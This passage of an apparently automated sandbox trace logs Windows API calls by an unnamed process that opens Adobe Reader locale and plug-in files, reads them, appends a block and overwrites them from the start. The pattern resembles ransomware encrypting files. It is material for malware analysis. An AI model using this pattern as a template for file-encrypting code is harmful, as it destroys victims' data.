dwFlags=0x0, lpWideCharStr="DVA.CHT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0087.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.CHT", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.CHT", lpUsedDefaultChar=0x0) returned 7 [0087.027] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0087.140] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1e00 [0087.140] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0087.235] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1e00 [0087.235] WriteFile (in: hFile=0x1e4, lpBuffer=0x26679c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26679c8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0087.236] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0087.236] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0087.236] CloseHandle (hObject=0x1e4) returned 1 [0087.237] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\RdLang32.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\rdlang32.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0087.237] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0087.237] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe0e00 [0087.237] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0087.238] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.238] ReleaseMutex (hMutex=0x168) returned 1 [0087.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.CHT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.CHT", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.CHT", lpUsedDefaultChar=0x0) returned 12 [0087.238] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0088.252] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0088.330] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xdfe00 [0088.330] ReadFile (in: hFile=0x1e4, lpBuffer=0x28a19d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28a19d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0088.416] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xdfe00 [0088.417] WriteFile (in: hFile=0x1e4, lpBuffer=0x2664368*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.418] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0088.418] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0088.419] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0088.419] CloseHandle (hObject=0x1e4) returned 1 [0088.419] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Spelling.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\spelling.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0088.420] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0088.420] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2000 [0088.420] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0088.420] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.421] ReleaseMutex (hMutex=0x168) returned 1 [0088.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.CHT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.421] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.CHT", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.CHT", lpUsedDefaultChar=0x0) returned 12 [0088.421] ReadFile (in: hFile=0x1e4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x2fdf2bc*=0x2000, lpOverlapped=0x0) returned 1 [0088.685] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0088.685] WriteFile (in: hFile=0x1e4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2588, lpOverlapped=0x0) returned 1 [0088.686] CloseHandle (hObject=0x1e4) returned 1 [0088.686] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\QRCode.pmp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\qrcode.pmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0088.687] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0088.687] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x13400 [0088.687] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0088.687] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.688] ReleaseMutex (hMutex=0x168) returned 1 [0088.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QRCode.pmp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0088.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QRCode.pmp", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QRCode.pmp", lpUsedDefaultChar=0x0) returned 10 [0088.688] ReadFile (in: hFile=0x1e4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0088.808] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x12400 [0088.808] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0088.926] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x12400 [0088.927] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.927] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0088.927] WriteFile (in: hFile=0x1e4, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0088.928] CloseHandle (hObject=0x1e4) returned 1 [0088.928] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\EScript.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\escript.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0088.930] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0088.930] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1ab863 [0088.930] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0088.930] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.931] ReleaseMutex (hMutex=0x168) returned 1 [0088.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.api", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0088.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.api", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.api", lpUsedDefaultChar=0x0) returned 11 [0088.931] ReadFile (in: hFile=0x1e4, lpBuffer=0x28b1148, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28b1148*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0090.011] ReadFile (in: hFile=0x1e4, lpBuffer=0x28b1148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28b1148*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0090.579] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1aa863 [0090.579] ReadFile (in: hFile=0x1e4, lpBuffer=0x2667c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0090.685] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1aa863 [0090.686] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867ab8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.686] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0090.686] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0090.686] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.686] CloseHandle (hObject=0x1e4) returned 1 [0090.687] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0090.687] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0090.687] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa00 [0090.687] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0090.687] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.687] ReleaseMutex (hMutex=0x168) returned 1 [0090.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.ESP", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0090.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.ESP", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.ESP", lpUsedDefaultChar=0x0) returned 9 [0090.687] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2fdf2bc*=0xa00, lpOverlapped=0x0) returned 1 [0090.689] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0090.689] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf2d0*=0xf88, lpOverlapped=0x0) returned 1 [0090.690] CloseHandle (hObject=0x1e4) returned 1 [0090.690] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0090.690] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0090.690] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa00 [0090.690] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0090.690] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.690] ReleaseMutex (hMutex=0x168) returned 1 [0090.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.NOR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0090.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.NOR", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.NOR", lpUsedDefaultChar=0x0) returned 9 [0090.691] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2fdf2bc*=0xa00, lpOverlapped=0x0) returned 1 [0090.775] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0090.775] WriteFile (in: hFile=0x1e4, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x2fdf2d0*=0xf88, lpOverlapped=0x0) returned 1 [0090.775] CloseHandle (hObject=0x1e4) returned 1 [0090.776] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0090.776] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0090.776] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2000 [0090.776] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0090.776] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.776] ReleaseMutex (hMutex=0x168) returned 1 [0090.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.DEU", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0090.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.DEU", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.DEU", lpUsedDefaultChar=0x0) returned 10 [0090.777] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2fdf2bc*=0x2000, lpOverlapped=0x0) returned 1 [0090.778] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0090.778] WriteFile (in: hFile=0x1e4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2588, lpOverlapped=0x0) returned 1 [0090.778] CloseHandle (hObject=0x1e4) returned 1 [0090.779] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0090.779] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0090.779] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2000 [0090.779] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0090.779] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.779] ReleaseMutex (hMutex=0x168) returned 1 [0090.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.NLD", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0090.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.NLD", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.NLD", lpUsedDefaultChar=0x0) returned 10 [0090.780] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2fdf2bc*=0x2000, lpOverlapped=0x0) returned 1 [0090.865] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0090.865] WriteFile (in: hFile=0x1e4, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x2588, lpOverlapped=0x0) returned 1 [0090.866] CloseHandle (hObject=0x1e4) returned 1 